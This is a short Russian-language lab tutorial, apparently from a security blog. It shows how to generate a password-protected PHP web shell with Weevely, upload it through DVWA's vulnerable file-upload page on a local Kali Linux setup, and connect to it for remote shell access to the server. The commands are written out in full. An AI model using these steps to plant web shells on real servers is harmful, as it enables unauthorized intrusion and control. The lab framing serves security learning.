Weevely — очень интересный инструмент, для атаки на веб-приложения. В этой небольшой статье рассмотрим пример использования Weevely на уязвимой платформе DVWA.
Еще по теме: Взлом веб-приложения с помощью брута Burp Suite
Использование Weevely для атаки на веб-приложения
Weevely имеет много интересных функций, среди которых:
- Прокси-серверы HTTP и HTTPS для просмотра зараженного веб-приложения.
- Возможность взлома учетных записей SQL.
- Мониторинг удаленной файловой системы.
- Прямой доступ к шелу.
- Загрузка и скачивание файлов.
- Навигация по файлам.
Рассмотрим работу Weevely. В качестве стенда будем использовать намеренно уязвимую систему DVWA (см. Установка и использование DVWA на Kali Linux).
Итак, после установки, запустите DVWA на Kali Linux.
Первым шагом будет запуск служб базы данных:
1 |
sudo service mysql start |
Запустите сервер Apache:
1 |
sudo service apache2 start |
Откройте браузер и перейдите по этой ссылке:
1 |
127.0.0.1/DWVA/ |
Вы должны увидеть страницу входа в DVWA.
Чтобы войти в систему, используйте учетные данные, которые были использованы во время установки DVWA.
Уменьшите уровень безопасности DVWA. Для этого просто перейдите в левое меню и найдите DVWA Security, затем измените в выпадающем меню Low и нажмите Submit.
Наша целевая машина готова к атаке! Чтобы создать шелл, вернитесь в Kali Linux и выполните команду:
1 |
weevely generate mypassword /home/kali/myshell.php |
Обратите внимание, что mypassword — это пароль шелла, которой мы создаем, а остальное — это путь и название шелла. В данной случае я сохраню его, как myshell.php.
Теперь вы можете перейти в свой пользовательский каталог, чтобы убедиться, что файл был создан, как показано на следующем рисунке:
Теперь вернемся к DVWA, чтобы загрузить нашу оболочку.
Для этого просто перейдите в File Upload в левом меню, затем нажмите Browse, найдите myshell.php и нажмите Upload.
Теперь необходимо скопировать расположение файла на сервере. Для этого просто скопируйте первую часть урла ( http://127.0.0.1/DVWA) и путь, выделенный в загруженном сообщении ( /hackable/uploads/myshell.php).
Теперь путь должен выглядеть так:
1 |
http://127.0.0.1/DVWA/hackable/uploads/myshell.php |
Снова откройте терминал Kali Linux, чтобы запустить оболочку с помощью следующей команды (обратите внимание, что здесь мы в основном добавляем путь к серверу и пароль для запуска оболочки):
1 |
weevely http://127.0.0.1/DVWA/hackable/uploads/myshell.php mypassword |
И теперь, как видно на скрине ниже, у нас есть полный доступ к серверу, в том числе навигации по файлам и многого другого.
Мы рассмотрел один из сценариев использования Weevely. Этого достаточно для начала. В следующей разберем другие кейсы.
ПОЛЕЗНЫЕ ССЫЛКИ: